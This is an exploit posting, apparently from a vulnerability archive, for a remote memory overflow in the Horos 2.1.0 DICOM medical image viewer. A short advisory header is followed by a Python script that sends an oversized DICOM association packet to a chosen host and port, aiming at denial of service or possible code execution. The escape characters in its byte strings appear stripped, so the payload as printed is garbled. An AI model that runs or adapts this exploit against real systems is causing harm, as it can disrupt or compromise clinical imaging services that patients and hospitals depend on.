Horos 2.1.0 DICOM Medical Image Viewer Remote Memory Overflow
Posted on 16 December 2016
#!/usr/bin/env python # -*- coding: utf8 -*- # # # Horos 2.1.0 DICOM Medical Image Viewer Remote Memory Overflow Vulnerability # # # Vendor: Horos Project # Product web page: https://www.horosproject.org # Affected version: 2.1.0 # # Summary: HorosaC/ is an open-source, free medical image viewer. The goal of the Horos Project is # to develop a fully functional, 64-bit medical image viewer for OS X. Horos is based upon OsiriX # and other open source medical imaging libraries. # # Desc: The vulnerability is caused due to the usage of vulnerable collection of libraries that # are part of DCMTK Toolkit, specifically the parser for the DICOM Upper Layer Protocol or DUL. # Stack/Heap Buffer overflow/underflow can be triggered when sending and processing wrong length # of ACSE data structure received over the network by the DICOM Store-SCP service. An attacker can # overflow the stack and the heap of the process when sending large array of bytes to the presentation # context item length segment of the DICOM standard, potentially resulting in remote code execution # and/or denial of service scenario. # # Tested on: OS X 10.12.2 (Sierra) # OS X 10.12.1 (Sierra) # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2016-5386 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5386.php # # # 15.12.2016 # import sys, socket hello = ('x01x00x00x00x80x71x00x01x00x00x4fx52x54x48' 'x41x4ex43x20x20x20x20x20x20x20x20x20x4ax4f' 'x58x59x50x4fx58x59x21x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00' 'x00x00x00x00x00x00x00x00x00x00x00x00x00x00' 'x00x00x00x00x10x00x00x15x31x2ex32x2ex38x34' 'x30x2ex31x30x30x30x38x2ex33x2ex31x2ex31x2e' 'x31x20x00x80x00') buffer = 'x41x42x43x44' * 10000 bye = ('x50x00x00x0cx51x00x00x04x00x00x07xde' 'x52x00x00x00') if len(sys.argv) < 3: print ' Usage: ' +sys.argv[0]+ ' <target> <port>' print 'Example: ' +sys.argv[0]+ ' 172.19.0.214 11112 ' sys.exit(0) host = sys.argv[1] port = int(sys.argv[2]) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) s.settimeout(251) s.send(hello+buffer+bye) s.close
